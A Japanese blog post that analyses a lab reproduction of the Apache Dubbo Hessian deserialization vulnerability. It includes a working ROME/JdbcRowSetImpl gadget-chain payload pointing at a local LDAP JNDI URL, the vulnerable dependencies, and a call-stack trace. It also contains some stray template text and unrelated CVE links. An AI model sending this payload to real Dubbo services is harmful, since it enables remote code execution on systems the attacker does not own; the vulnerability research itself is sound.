<!DOCTYPE html>
<html lang="jp" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="llllIIIllll" />
  <meta name="description" content="we comed, we leave the thing " />
  
  
  <title>
    
      Dubboデシリアライゼーション脆弱性分析 
      
      
      |
    
     llllIIIllll
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 6.2.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/avatar.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">llllIIIllll</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">ホーム</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">アーカイブス</a>
        </li>
      
        <li class="nav-item" data-path="/categories/">
          <a href="/categories/">カテゴリー</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">タグ</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">について</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">Dubboデシリアライゼーション脆弱性分析</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
          2022-09-11 13:54:07
        </span>
        
              <span class="post-categories">
                <i class="iconfont icon-bookmark" title="Categories"></i>
                
                <span class="span--category">
                  <a href="/categories/java/" title="java">
                    <b>#</b>java
                  </a>
                </span>
                
                <span class="span--category">
                  <a href="/categories/java/Dubbo/" title="Dubbo">
                    <b>#</b>Dubbo
                  </a>
                </span>
                
              </span>
          
              <span class="post-tags">
                <i class="iconfont icon-tags mr-10" title="Tags"></i>
                
                <span class="span--tag mr-8">
                  <a href="/tags/bin/" title="bin">
                    #bin
                  </a>
                </span>
                
                <span class="span--tag mr-8">
                  <a href="/tags/java/" title="java">
                    #java
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h4 id="Dubboデシリアライゼーション脆弱性分析"><a href="#Dubboデシリアライゼーション脆弱性分析" class="headerlink" title="Dubboデシリアライゼーション脆弱性分析"></a>Dubboデシリアライゼーション脆弱性分析</h4><p>Apache Dubbo は高性能、軽量のオープンソース Java RPC フレームワークで、インターフェース指向のリモートメソッド呼び出し、インテリジェントな耐障害性と負荷分散、サービスの自動登録と検出という 3 つの中核機能を提供します。</p>
<p>Dubbo RPCは、Apache Dubboシステムの中核をなす、高性能・高スループットのリモート呼び出し方式で、主に2つのDubboシステム間のリモート呼び出しを行う。 Dubbo RPCでは、dubboシリアライズ、hesian2シリアライズ、kryoシリアライズ、jsonシリアライズ、javaシリアライズなど、さまざまなシリアライズ方式がサポートされています。</p>
<p>公式推奨のデフォルトのダボプロトコル</p>
<p>アーキテクチャは主に以下の通りです。</p>
<p><img src="/../../../img/bin/java/dubbo/01.png" alt="avatar"></p>
<table>
<thead>
<tr>
<th>ノード</th>
<th>役割の説明</th>
</tr>
</thead>
<tbody><tr>
<td>プロバイダ</td>
<td>サービスを公開するサービスプロバイダ</td>
</tr>
<tr>
<td>消費者</td>
<td>リモートサービスを呼び出すサービス消費者</td>
</tr>
<tr>
<td>レジストリ</td>
<td>サービスの登録と発見を行う登録センター</td>
</tr>
<tr>
<td>モニター</td>
<td>サービスの起動回数と起動時間をカウントする監視センター</td>
</tr>
<tr>
<td>コンテナ</td>
<td>サービス実行中のコンテナ</td>
</tr>
</tbody></table>
<p>通話関係の説明</p>
<ul>
<li>サービスコンテナは、サービスプロバイダの起動、ロード、実行を担当する。</li>
<li>サービスプロバイダは、提供するサービスを起動時にレジストリに登録する。</li>
<li>サービス消費者は、起動時に必要とするサービスのレジストリを購読する。</li>
<li>レジストリは、サービスプロバイダのアドレス一覧をコンシューマに返し、変更があれば、長い接続に基づいて、変更後のデータをコンシューマにプッシュする。</li>
<li>サービス利用者は、プロバイダアドレスのリストから、ソフトロードバランシングアルゴリズムに基づいて呼び出すプロバイダを選択し、呼び出しに失敗した場合は、別のプロバイダを選択して呼び出すことができます。</li>
<li>サービス利用者とプロバイダーは、呼び出し回数と呼び出し時間をメモリに蓄積し、1分間隔で監視センターに統計情報を送信</li>
</ul>
<h5 id="環境設定"><a href="#環境設定" class="headerlink" title="環境設定"></a>環境設定</h5><p>公式ケースを直接使用する</p>
<p><a target="_blank" rel="noopener" href="https://github.com/apache/dubbo-samples">https://github.com/apache/dubbo-samples</a></p>
<p>httpの例があります。</p>
<p>Dubboサービスを利用するには、レジストリのzookeeperが必要です</p>
<p><a target="_blank" rel="noopener" href="https://zookeeper.apache.org/releases.html">https://zookeeper.apache.org/releases.html</a></p>
<p>インターフェース</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">package org.apache.dubbo.samples.http.api;</span><br><span class="line"></span><br><span class="line">public interface DemoService &#123;</span><br><span class="line">    String sayHello(String name);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p>実装クラス</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">public class DemoServiceImpl implements DemoService &#123;</span><br><span class="line"></span><br><span class="line">    @Override</span><br><span class="line">    public String sayHello(String name) &#123;</span><br><span class="line">        System.out.println(&quot;[&quot; + new SimpleDateFormat(&quot;HH:mm:ss&quot;).format(new Date()) + &quot;] Hello &quot; + name +</span><br><span class="line">                &quot;, request from consumer: &quot; + RpcContext.getContext().getRemoteAddress());</span><br><span class="line">        return &quot;Hello &quot; + name + &quot;, response from provider: &quot; + RpcContext.getContext().getLocalAddress();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>サービスプロバイダー</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">public class HttpProvider &#123;</span><br><span class="line"></span><br><span class="line">    public static void main(String[] args) throws Exception &#123;</span><br><span class="line">        ClassPathXmlApplicationContext context = new ClassPathXmlApplicationContext(&quot;spring/http-provider.xml&quot;);</span><br><span class="line">        context.start();</span><br><span class="line"></span><br><span class="line">        System.out.println(&quot;dubbo service started&quot;);</span><br><span class="line">        new CountDownLatch(1).await();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


<p>コンシューマーズ</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">public class HttpConsumer &#123;</span><br><span class="line"></span><br><span class="line">    public static void main(String[] args) throws Exception &#123;</span><br><span class="line">        ClassPathXmlApplicationContext context = new ClassPathXmlApplicationContext(&quot;spring/http-consumer.xml&quot;);</span><br><span class="line">        context.start();</span><br><span class="line"></span><br><span class="line">        DemoService demoService = (DemoService) context.getBean(&quot;demoService&quot;);</span><br><span class="line">        String result = demoService.sayHello(&quot;world&quot;);</span><br><span class="line">        System.out.println(result);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>ここでも、リソースディレクトリにプロバイダーとサービサーのコンフィギュレーションを設定する必要があります</p>
<p>http-provider.xml ：インターフェースと実装クラスの設定</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;beans xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot;</span><br><span class="line">       xmlns:dubbo=&quot;http://dubbo.apache.org/schema/dubbo&quot;</span><br><span class="line">       xmlns=&quot;http://www.springframework.org/schema/beans&quot; xmlns:context=&quot;http://www.springframework.org/schema/context&quot;</span><br><span class="line">       xsi:schemaLocation=&quot;http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd</span><br><span class="line">       http://dubbo.apache.org/schema/dubbo http://dubbo.apache.org/schema/dubbo/dubbo.xsd http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context.xsd&quot;&gt;</span><br><span class="line">    &lt;context:property-placeholder/&gt;</span><br><span class="line"></span><br><span class="line">    &lt;dubbo:application name=&quot;http-provider&quot;/&gt;</span><br><span class="line"></span><br><span class="line">    &lt;dubbo:registry address=&quot;zookeeper://$&#123;zookeeper.address:127.0.0.1&#125;:2181&quot;/&gt;</span><br><span class="line"></span><br><span class="line">    &lt;dubbo:protocol name=&quot;http&quot; id=&quot;http&quot; port=&quot;$&#123;servlet.port:8080&#125;&quot; server=&quot;$&#123;servlet.container:tomcat&#125;&quot;/&gt;</span><br><span class="line"></span><br><span class="line">    &lt;bean id=&quot;demoService&quot; class=&quot;org.apache.dubbo.samples.http.impl.DemoServiceImpl&quot;/&gt;</span><br><span class="line"></span><br><span class="line">    &lt;dubbo:service interface=&quot;org.apache.dubbo.samples.http.api.DemoService&quot; ref=&quot;demoService&quot; protocol=&quot;http&quot;/&gt;</span><br><span class="line">&lt;/beans&gt;</span><br></pre></td></tr></table></figure>

<p>http-consumer.xml：アクセスするインターフェースを設定する。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;beans xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot;</span><br><span class="line">       xmlns:dubbo=&quot;http://dubbo.apache.org/schema/dubbo&quot;</span><br><span class="line">       xmlns=&quot;http://www.springframework.org/schema/beans&quot; xmlns:context=&quot;http://www.springframework.org/schema/context&quot;</span><br><span class="line">       xsi:schemaLocation=&quot;http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd</span><br><span class="line">       http://dubbo.apache.org/schema/dubbo http://dubbo.apache.org/schema/dubbo/dubbo.xsd http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context.xsd&quot;&gt;</span><br><span class="line">    &lt;context:property-placeholder/&gt;</span><br><span class="line"></span><br><span class="line">    &lt;dubbo:application name=&quot;http-consumer&quot;/&gt;</span><br><span class="line"></span><br><span class="line">    &lt;dubbo:registry address=&quot;zookeeper://$&#123;zookeeper.address:127.0.0.1&#125;:2181&quot;/&gt;</span><br><span class="line"></span><br><span class="line">    &lt;dubbo:reference id=&quot;demoService&quot; interface=&quot;org.apache.dubbo.samples.http.api.DemoService&quot;/&gt;</span><br><span class="line">&lt;/beans&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>最後にzookeeperプロバイダ、consumerを起動します。</p>
<h5 id="デシリアライズの脆弱性"><a href="#デシリアライズの脆弱性" class="headerlink" title="デシリアライズの脆弱性"></a>デシリアライズの脆弱性</h5><h6 id="Hessian协议-lt-x3D-2-7-6"><a href="#Hessian协议-lt-x3D-2-7-6" class="headerlink" title="Hessian协议&lt;&#x3D; 2.7.6"></a>Hessian协议&lt;&#x3D; 2.7.6</h6><p>影響範囲<br>2.7.0 &lt;&#x3D; Dubbo Version &lt;&#x3D; 2.7.6<br>2.6.0 &lt;&#x3D; Dubbo Version &lt;&#x3D; 2.6.7<br>Dubbo 全バージョン 2.5.x (現在、公式チームによるサポートはありません)</p>
<p>環境<br>ここでの主な脆弱性は、hessianプロトコルによるdubboのデフォルトのデシリアライゼーションによるもので、私は公式の例を環境として参照します。</p>
<p><a target="_blank" rel="noopener" href="https://github.com/apache/dubbo-spring-boot-project">https://github.com/apache/dubbo-spring-boot-project</a></p>
<p>脆弱性バージョン2.7.5をダウンロードし、pom.xmlファイルのクローンや修正も行います。</p>
<p><img src="/../../../img/bin/java/dubbo/02.png" alt="avatar"></p>
<p>サービスプロバイダーとして、プロバイダーサンプルの一つを使用しています</p>
<p>まずpom.xmlの条件付き利用依存関係では、多くの利用チェーンがあり、どのような依存関係に応じてどのようなチェーンを再生するためにあるSpringPartiallyComparableAdvisorHolder SpringAbstractBeanFactoryPointcutAdvisorローマROME + CCなどです。Groovy、その他多くの活用の連鎖</p>
<p>ここでは、JNDIインジェクションを打つRomeと、ネットから出ないROME+CCの例を見てみましょう。</p>
<p>まず、ROME依存とCC依存を追加します。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>


<h5 id="Generate-static-files"><a href="#Generate-static-files" class="headerlink" title="Generate static files"></a>Generate static files</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;dependency&gt;</span><br><span class="line">    &lt;groupId&gt;com.rometools&lt;/groupId&gt;</span><br><span class="line">    &lt;artifactId&gt;rome&lt;/artifactId&gt;</span><br><span class="line">    &lt;version&gt;1.7.0&lt;/version&gt;</span><br><span class="line">&lt;/dependency&gt;</span><br><span class="line">&lt;dependency&gt;</span><br><span class="line">    &lt;groupId&gt;commons-collections&lt;/groupId&gt;</span><br><span class="line">    &lt;artifactId&gt;commons-collections&lt;/artifactId&gt;</span><br><span class="line">    &lt;version&gt;3.2.1&lt;/version&gt;</span><br><span class="line">&lt;/dependency&gt;</span><br></pre></td></tr></table></figure>

<p>JNDIインジェクションはJDKの上位バージョンでは制限されているため、もちろん上位バージョンのバイパスメソッドも存在しますが、ここでは便宜上、プロパティ値をtrueに設定することにします</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">System.setProperty(&quot;com.sun.jndi.ldap.object.trustURLCodebase&quot;, &quot;true&quot;);</span><br></pre></td></tr></table></figure>
<p>次に、コムスマー環境を設定する</p>
<p>ROME チェーンを形成する getPayload メソッドを条件とする。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">private static Object getPayload() throws Exception &#123;</span><br><span class="line">    //反序列化时ToStringBean.toString()会被调用，触发JdbcRowSetImpl.getDatabaseMetaData-&gt;JdbcRowSetImpl.connect-&gt;Context.lookup</span><br><span class="line">    String jndiUrl = &quot;ldap://127.0.0.1:1389/xitdbc&quot;;</span><br><span class="line">    JdbcRowSetImpl rs = new JdbcRowSetImpl();</span><br><span class="line">    rs.setDataSourceName(jndiUrl);</span><br><span class="line">    rs.setMatchColumn(&quot;foo&quot;);</span><br><span class="line"></span><br><span class="line">//反序列化时EqualsBean.beanHashCode会被调用，触发ToStringBean.toString</span><br><span class="line">    ToStringBean item = new ToStringBean(JdbcRowSetImpl.class, rs);</span><br><span class="line"></span><br><span class="line">//反序列化时HashMap.hash会被调用，触发EqualsBean.hashCode-&gt;EqualsBean.beanHashCode</span><br><span class="line">    EqualsBean root = new EqualsBean(ToStringBean.class, item);</span><br><span class="line"></span><br><span class="line">//HashMap.put-&gt;HashMap.putVal-&gt;HashMap.hash</span><br><span class="line">    HashMap&lt;Object, Object&gt; s = new HashMap&lt;&gt;();</span><br><span class="line">    setFieldValue(s, &quot;size&quot;, 2);</span><br><span class="line">    Class&lt;?&gt; nodeC;</span><br><span class="line">    try &#123;</span><br><span class="line">        nodeC = Class.forName(&quot;java.util.HashMap$Node&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    catch ( ClassNotFoundException e ) &#123;</span><br><span class="line">        nodeC = Class.forName(&quot;java.util.HashMap$Entry&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    Constructor&lt;?&gt; nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);</span><br><span class="line">    nodeCons.setAccessible(true);</span><br><span class="line"></span><br><span class="line">    Object tbl = Array.newInstance(nodeC, 2);</span><br><span class="line">    Array.set(tbl, 0, nodeCons.newInstance(0, root, root, null));</span><br><span class="line">    Array.set(tbl, 1, nodeCons.newInstance(0, root, root, null));</span><br><span class="line">    setFieldValue(s, &quot;table&quot;, tbl);</span><br><span class="line"></span><br><span class="line">    return s;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>このデータは、メソッドが呼び出されたときに渡されます。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">@Bean</span><br><span class="line">public ApplicationRunner runner() throws Exception&#123;</span><br><span class="line">    Object o = getPayload();</span><br><span class="line">    //return args -&gt; logger.info(demoService.sayHello(&quot;mercyblitz&quot;));</span><br><span class="line">    return args -&gt; logger.info(demoService.commonTest(o));</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>


<p>分析<br>さて、環境が整ったので、デバッグしてプロバイダを実行してみましょう</p>
<p>を実行し、コンシューマの例を実行します。</p>
<p>コールスタックを最初に与え、その詳細を分析する。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">connect:624, JdbcRowSetImpl (com.sun.rowset)</span><br><span class="line">getDatabaseMetaData:4004, JdbcRowSetImpl (com.sun.rowset)</span><br><span class="line">invoke0:-1, NativeMethodAccessorImpl (sun.reflect)</span><br><span class="line">invoke:62, NativeMethodAccessorImpl (sun.reflect)</span><br><span class="line">invoke:43, DelegatingMethodAccessorImpl (sun.reflect)</span><br><span class="line">invoke:498, Method (java.lang.reflect)</span><br><span class="line">toString:158, ToStringBean (com.rometools.rome.feed.impl)</span><br><span class="line">toString:129, ToStringBean (com.rometools.rome.feed.impl)</span><br><span class="line">beanHashCode:198, EqualsBean (com.rometools.rome.feed.impl)</span><br><span class="line">hashCode:180, EqualsBean (com.rometools.rome.feed.impl)</span><br><span class="line">hash:339, HashMap (java.util)</span><br><span class="line">put:612, HashMap (java.util)</span><br><span class="line">doReadMap:145, MapDeserializer (com.alibaba.com.caucho.hessian.io)</span><br><span class="line">readMap:126, MapDeserializer (com.alibaba.com.caucho.hessian.io)</span><br><span class="line">readObject:2703, Hessian2Input (com.alibaba.com.caucho.hessian.io)</span><br><span class="line">readObject:2278, Hessian2Input (com.alibaba.com.caucho.hessian.io)</span><br><span class="line">readObject:2080, Hessian2Input (com.alibaba.com.caucho.hessian.io)</span><br><span class="line">readObject:2074, Hessian2Input (com.alibaba.com.caucho.hessian.io)</span><br><span class="line">readObject:92, Hessian2ObjectInput (org.apache.dubbo.common.serialize.hessian2)</span><br><span class="line">decode:139, DecodeableRpcInvocation (org.apache.dubbo.rpc.protocol.dubbo)</span><br><span class="line">decode:79, DecodeableRpcInvocation (org.apache.dubbo.rpc.protocol.dubbo)</span><br><span class="line">decode:57, DecodeHandler (org.apache.dubbo.remoting.transport)</span><br><span class="line">received:44, DecodeHandler (org.apache.dubbo.remoting.transport)</span><br><span class="line">run:57, ChannelEventRunnable (org.apache.dubbo.remoting.transport.dispatcher)</span><br><span class="line">runWorker:1149, ThreadPoolExecutor (java.util.concurrent)</span><br><span class="line">run:624, ThreadPoolExecutor$Worker (java.util.concurrent)</span><br><span class="line">run:748, Thread (java.lang)</span><br><span class="line"></span><br></pre></td></tr></table></figure>


<p>最初はすべてメソッドトリガーの呼び出しで、その後DecodeHandler#receivedメソッドでデコードメソッドを呼び出し、デコード処理を開始します</p>
<p><a target="_blank" rel="noopener" href="https://github.com/NafisiAslH/KnowledgeSharing/tree/main/CyberSecurity/Web/CVEs/CVE-2022/CVE-2022-30190">https://github.com/NafisiAslH/KnowledgeSharing/tree/main/CyberSecurity/Web/CVEs/CVE-2022/CVE-2022-30190</a><br><a target="_blank" rel="noopener" href="https://github.com/klezVirus/CVE-2021-40444/">https://github.com/klezVirus/CVE-2021-40444/</a></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2022/09/08/bin/linux/cve-2022-2639/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
              2022-09-11 13:54:07
            </span>
            
                  <span class="post-categories">
                    <i class="iconfont icon-bookmark" title="Categories"></i>
                    
                    <span class="span--category">
                      <a href="/categories/java/" title="java">
                        <b>#</b>java
                      </a>
                    </span>
                    
                    <span class="span--category">
                      <a href="/categories/java/Dubbo/" title="Dubbo">
                        <b>#</b>Dubbo
                      </a>
                    </span>
                    
                  </span>
              
                  <span class="post-tags">
                    <i class="iconfont icon-tags mr-10" title="Tags"></i>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/bin/" title="bin">
                        #bin
                      </a>
                    </span>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/java/" title="java">
                        #java
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#Dubbo%E3%83%87%E3%82%B7%E3%83%AA%E3%82%A2%E3%83%A9%E3%82%A4%E3%82%BC%E3%83%BC%E3%82%B7%E3%83%A7%E3%83%B3%E8%84%86%E5%BC%B1%E6%80%A7%E5%88%86%E6%9E%90"><span class="toc-text">Dubboデシリアライゼーション脆弱性分析</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E7%92%B0%E5%A2%83%E8%A8%AD%E5%AE%9A"><span class="toc-text">環境設定</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E3%83%87%E3%82%B7%E3%83%AA%E3%82%A2%E3%83%A9%E3%82%A4%E3%82%BA%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7"><span class="toc-text">デシリアライズの脆弱性</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#Hessian%E5%8D%8F%E8%AE%AE-lt-x3D-2-7-6"><span class="toc-text">Hessian协议&lt;&#x3D; 2.7.6</span></a></li></ol></li><li class="toc-item toc-level-5"><a class="toc-link" href="#Generate-static-files"><span class="toc-text">Generate static files</span></a></li></ol></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/llllIIIllll">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/llllIIIllll">Copyright © 2023</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/llllIIIllll">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="キーワード">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
